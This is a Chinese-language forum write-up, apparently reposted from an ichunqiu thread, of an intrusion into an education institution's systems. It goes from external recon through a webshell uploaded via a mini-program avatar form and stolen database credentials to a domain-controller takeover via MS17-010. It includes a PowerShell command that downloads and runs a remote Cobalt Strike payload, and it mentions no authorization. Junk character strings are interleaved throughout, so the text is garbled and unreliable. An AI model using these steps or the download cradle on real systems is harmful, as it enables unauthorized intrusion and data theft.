|
6 k* _+ i: B/ x+ t# @& [
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路- o$ F r. [1 V
: S; t0 r7 L% g/ O' Y/ F/ W
* t! a) h! J4 Q- |% i
* m5 [' d) r: c/ [& R$ \
, e! R0 V* C+ E
# C$ h/ i' s" y- j( ^ 正文
& Q4 P5 H0 c, Z! t6 H/ s) H& s 1 d) c1 q( N( [6 [$ a7 M5 W2 U8 D! i
# ^$ t: p7 e- N5 M9 o% a
/ c- a# W4 T4 m' m1 N , s/ M& V, L1 H7 n# y9 C' o
8 i% f5 ?# C$ G: h0 G$ G) ?
目标:www.xxxx.com(一家教育机构)
) i' m4 Z) k1 o4 f& h打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
' D1 B' b1 p/ a& \+ ? ! ^/ L6 A2 p0 a! w
% `0 Q' V3 Q, k
! f, o2 v+ I6 e7 j9 C7 J6 d # s4 z( L4 z) X0 G6 ~" i
" X& d, \$ h; ~% |: Y
进行了简单的信息搜集
- o' l: }9 r2 e- h( g
" R% g# c! M$ Y" t g1 V& H+ i' x9 [7 a. f u
( F% P8 Q7 \3 G: A# G ~; ]
5 }3 W* Y$ d T( `) T5 G% {: R
子域名搜集
. N( L2 Y$ o1 [) s# d; z" o 1 @; Z; ^( |. h: ^# V
; ]( b3 v1 P9 {7 k! L7 \$ l : E& y8 R' r/ d) ~0 h( i; j
8 K! W3 j, E3 G$ B' ~% X
) o% d- o9 [# g3 w, Y$ m( L
fofa找资产 ) v0 G8 V2 {1 C; x0 B
; A! C8 _1 y3 X6 q A i, h
n. C& U" r2 O$ X) s& O
5 O$ g5 G: j: I& b
9 l% ?7 v5 Z+ a: f {
7 ~$ L( X% ^& z/ b 0 H5 K, d; w* l! Y! \) a
5 m+ x/ o! H5 [, U9 b
一共七个资产。去重之后只有两个。 # _" J3 @+ q% k
6 H7 h6 u2 Z/ ?: T, U" g4 Y0 I4 R
: m* I3 o' v6 G) L- a% m
7 }4 r' H( j* ^/ C
( b3 k% X' j! C. b 目录探测
i; B4 x( t/ w7 `) J& F
! @0 n) m* I. n, A) C, `; S+ Q6 X9 o. q4 A* _
2 c K% Q/ r4 ^# J, L
: v# k( ~3 l; O$ c$ ]1 R2 a( h
" `7 @$ }, B j* F' O
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 , i6 E+ @! O. u9 S) M% w$ R$ g
$ @2 o& T. L2 p4 I% B+ L
, z0 y5 V+ ~8 Z) ~+ R$ { - s& T @. B2 ?, t6 p: c5 U
% T* f) R; c- g% d 我又尝试了通过修改返回包来绕过登录界面; k0 K' R5 E& @+ S
! m2 ^" c* x, J8 s
/ u. w0 x% \ j! E 3 H2 @7 e/ s6 S& B
" X( {% f: \* r* m6 h u$ {5 X
) A" z7 M& `$ H/ F& N 还是不行,尝试注入无果
0 |2 i" r+ ^- ~; @ / |' m7 i: T% h! W
0 S/ \! n7 N1 p8 Z: n( f
1 P. I2 ^% Y; p- t& c 9 N F6 @2 y5 {! N) p3 l _: R' S
1 ~, Q- ]& n' j7 d6 ~ 不过我目录探测出了一处Spring信息泄露 6 @: Q! t$ _# ~0 e# H4 m: u) Z; H
5 m9 X L+ I8 R; N P! m* N, d. O# e( U+ @
4 [8 J% F! Y, ~! D6 U+ V$ Y
h `$ s" B& t9 F# {+ j # t8 ~. @) F$ G# D& f
/ V+ [3 ?. @) R# T: U( i N5 o, s6 t3 X4 k6 u
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录9 W0 F3 @2 S$ F. \
$ @$ O5 V1 R X! l8 y$ T, ^: \# g/ a
' _$ B# }/ e! g& F
8 [1 N4 W* `; q! o( t. V % p3 f2 `; U, W; K, r9 b. c
2 O- P1 R" h3 I 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
/ ?- v: k# w# S7 {: i9 P $ @6 M% r- A" |/ r9 u
- p: A* o z4 r3 i
7 J1 S/ n) t5 l+ R% D `- A
" v0 t, x3 ^. ~" l( }" h* ]" u& V4 y" c( }9 {
获取有些师傅到这一步就手机抓包电脑测了。
3 l2 e3 a6 {+ q4 x V+ s 7 x+ I9 G4 G. |4 i: Q
3 [9 l4 j/ w V
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
. B1 F5 W4 W' b7 Z d1 k1 i
L+ n' X/ u) N% \) H1 m) b6 _. H" A9 K( x4 Y
其中在一个公众号发现了小程序,可以进行注册。
7 M" a7 k9 x; V/ F9 r- s4 D! d' K/ Z 9 t- a, H% m( }8 J, g3 Q; R
q+ R8 U" g' O; l* d" a, X
看到了头像上传,尝试上传获取WebShell' j' J- v0 g) d
9 S% h" h! F; x1 j9 W
6 q) V. ]8 m4 V) z u$ Y5 ~1 | % Z1 Z% z4 n" {7 u% Z) ^; n
; A" t$ y: D" _
3 A" p, F' M$ F0 \
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问. J0 t! Z* u$ [1 N a
* ?. X$ s: o# X( R4 Y5 V7 Y" Q0 z
8 S* ?! Q+ `3 o * N: x2 i* S* H4 y9 o
6 {$ U1 ?) m$ D) `( Q5 o6 d
' G! O" O, Z& ?/ w4 M( x; ^
然后上了大马
2 N. R( J# a% u" S7 w # h4 k4 U' H; T; x$ v( D
4 [ Z9 \# {3 o8 J) W4 Z% [8 `
, ?; O9 g2 d: |- |$ \" ?: Q& N. X
7 w9 m8 \* t/ }/ r- u9 L) D/ D6 F4 m
5 t. Y4 \/ l3 }# W + B/ `9 q, L9 F2 P
' ?2 j) o8 P: J& g( f0 W
通过翻找文件发现数据库账号密码+ N5 w+ I: I, A
7 `) {3 Y. \& h( q/ [6 O
2 u* v6 K1 Z8 p& }+ l
0 r8 w5 h0 W" |, M V- L6 z9 c
. P5 a' Y8 ^( |6 F z% ?" m3 B: X" S0 p1 U, J$ k) Y3 y; T
--内网渗透
, u# b9 D8 t" @6 T C ( j# G- }* V9 j) E1 I" S; w0 y
6 z! _* v/ Y K: I" Z& C
直接通过powershell执行 cs上线0 M" A* M% |" ]1 r6 O
1 f% M5 O, D% H2 i; S: j5 ?1 @" \& A1 v- O
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
1 ~! m8 R. j3 j1 T+ M7 }: j
# p8 W0 D2 y9 }" r
0 U+ u3 L8 ]; g' s; q
+ _- O+ d4 j# A0 I
9 M1 |9 Q1 n% {; z. I9 l
/ b3 P, _7 V8 y6 w% E9 I 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破4 j! j2 M1 @3 N
$ o8 w( a0 p7 W5 Z( U! l3 c- k. t2 z* G
8 h8 i. p* `7 t& v" W! ? & g& S/ Z) y) h! j! b
% K5 D6 Q% x7 F+ ]0 | ~+ y
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 3 k0 x" R6 J8 m* R
5 l3 K0 k, \( k0 v
, n7 k/ z: P6 [* W
0 M. `4 g& d3 D
2 R6 {1 |( ~8 I, ]; h. x: J/ @. h0 K: H5 b: E S) E
; \3 G' R$ u1 r! B+ k
; `6 L" H; ^4 A4 t+ Y2 k0 I1 B* I; S+ a4 c
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
' m7 Y, b! T& e6 H1 Q2 B9 ^ * T' l5 X) a+ H/ p; n
( l2 J; a, K `$ S" u' h
4 X4 I& ?9 J: k, I0 `$ E0 T! _
2 M7 M3 y9 R9 T$ V; Q7 W/ Y: \2 a
! y# \! f$ m ~8 k, @9 b1 T * M5 y2 c2 ?5 e, n" x3 P) Y
; y+ }2 v, I" P/ {0 I0 B$ E+ x # j3 j5 Z/ s0 y9 k2 N$ t- h% w
: Q9 Y* t8 } q: c" o0 E$ I, t* T0 [8 n8 ]
0 y% a* |9 S8 c3 r" k5 s& q% z1 Z3 m9 G* h5 I" x: T& x( L" t; N
" C1 @7 I" g, a1 h
+ [# ]! ~/ Y1 m
; k: ~& x. I$ S
小结, X! E8 d9 h7 `
6 f+ U) L6 x) i( J. L; F- a
! p+ A+ w% ]* J
& H. \+ p4 L/ g' Y5 \& q4 _
( i, o0 K: V7 P0 ^) b; A
2 ?; b' f M1 t4 g! N 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
+ W: Z6 `* L. M' k4 W9 V9 q
* z. ~% B( y4 M3 ~
8 R) t5 V. @; a3 g0 a* B
2 b( q& \6 [- e7 H, q 3 f. b5 ~& W2 m8 d
( m( c& n' S9 O+ {. E -
9 A/ c7 _8 `: _2 u
, c. X2 q9 O& M
- f5 I* \& C7 s! \, N
- * |" Y- W! `/ O3 L
) F9 q1 a6 j) G( ]* t$ }
0 T. X. f: x7 W4 A4 `4 U
5 i+ |( h7 t! S7 M5 y4 ^
* |3 B/ h) d# I! Q/ | 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html8 p! L# o) r1 z2 [% u& V
5 i: a( a. I* i& [' P# l
& \- u9 R9 i# V$ q4 {, [" I
3 Q) H' j! [6 b, Q4 U9 M |